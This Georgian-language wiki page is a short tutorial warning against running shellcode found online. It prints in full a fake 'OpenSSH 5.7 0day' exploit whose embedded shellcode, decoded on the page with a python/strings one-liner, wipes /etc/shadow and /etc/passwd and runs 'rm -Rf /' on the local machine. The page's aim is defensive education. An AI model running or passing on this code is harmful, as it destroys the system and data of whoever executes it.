ალბათ გაგიგიათ რომ ინტერნეტში ნაპოვნ შელკოდს არ უნდა ენდოთ და უნდა შეამოწმოთ იგი რას აკეთებს სინამდვილეში თორე დაზარალებული შენ დარჩები, მაგალითად შელკოდი თავდასხმას სხვა კომპიუტერზე კი არ გაანხორციელებს არამედ ლოკალურ კომპიუტერში და გაშვებს შელს, წაშლის ფაილებს ან სზვა.

შელკოდი არის კოდი რომლის ინექცია ხდება კომპიუტერის მეხსიერებაში, გაშვებული პოგრამის სივრცეში რომ ეს კოდი იმ პროგრამის უფლებებისდაგვარად გაიშვას და ისარგებლოს ნების დართვით. კოდის ინექცია ხდება მაგალითად buffer overflow-ს ექსპლუატაციის მეშვეობით.

მაგალითად 2011 წლის 26 იანვარს ვიღაც Chroniccommand-მა დაიბრალა OpenSSH-ის ექსპლოიტის შექმნა და სხვებისთვის დადო http://pastebin.com/sg77hWrg. უნდა ვენდოთ თუ არა ამ ექსპლოიტს?

/*
openSSH 5.7 0day exploit
Off by One error in auth2-pubkey.c
Author: Chroniccommand
Usage: ./exploit <host> <ip>
greetz to _st4ck3d*, x3n0n, xin etc you know who you are
*/
#include <stdio.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
 
void usage(char *argv[])
{
 printf("Usage: %s <target> <port>\n", argv[0]);
 exit(1);
}
 
unsigned char shellcode[] =
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x39\x00\x00\x00\x65"
"\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x73"
"\x68\x61\x64\x6f\x77\x20\x3b\x20\x65\x63\x68\x6f\x20\x22\x22"
"\x20\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20"
"\x3b\x20\x72\x6d\x20\x2d\x52\x66\x20\x2f\x00\x57\x53\x89\xe1"
"\xcd\x80";
 
int main(int argc, char *argv[])
{
 int uid = getuid();
 int port = 22, sock;
 struct hostent *host;
 struct sockaddr_in addr;
 
 if(uid !=0)
 {
  fprintf(stderr, "[!!]Error: You must be root\n");
  exit(1);
 }
 if(uid == 0)
 {
  printf("\t[+]Starting exploit..\n");
 }
 if(argc != 3)
    usage(argv);
 
 fprintf(stderr, "[!!]Exploit failed\n");
 (*(void(*)())shellcode)();
 exit(1);
 char payload[1024];
 memcpy(payload, &shellcode, sizeof(shellcode));
 if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)
 {
  printf("[+]Got shell\n");
  system("/bin/sh");
 }
 else if(connect(sock,(struct sockaddr*)&addr, sizeof(addr))==-1)
 {
  fprintf(stderr, "[!!]Exploit failed\n");
  exit(1);
 }
}

რომ შეამოწმოთ რას აკეთებს შელკოდი იუნიქსისნაირ სისტემაში ქენით ასე:

shell$ python -c 'print "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x39\x00\x00\x00\x65\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77\x20\x3b\x20\x65\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20\x3b\x20\x72\x6d\x20\x2d\x52\x66\x20\x2f\x00\x57\x53\x89\xe1\xcd\x80"' | strings

დაკვირვება: შეგიძლია python -c შეცვალო perl -e-თი თუ პერლის მოხმარება გსურს.

ეს ბრძანება იძლევა შემდგომ რეზულტატს:

Rfh-c
h/sh
h/bin
echo "" > /etc/shadow ; echo "" > /etc/passwd ; rm -Rf /

როგორც ვხედავთ ეს ტყუილი ექსპლოიტია, სინამდვილეში იგი ლოკალურ კომპიუტერში შლის ყოველივე პაპკას და ფაილს. არ დაივიწყოთ ინტერნეტში ნაპოვნი შელკოდისთვის ანალიზირების ჩატარება!

ყურაფღება: თუ შელკოდი პოლიმორფიულ ტექნიკას იყენებს რომ IDS-ებმა ვერ აღმოაჩინონ მისი მავნეულობა მისი ანალიზი უფრო რთულია და ეს მეთოდი ვერ გაჭრის.

შელკოდი/შელკოდის_დეშიფრაცია.txt · Last modified: 2011/09/26 20:51 by dzvelivereli
Back to top
Public Domain
chimeric.de = chi`s home Valid CSS Driven by DokuWiki do yourself a favour and use a real browser - get firefox!! Recent changes RSS feed Valid XHTML 1.0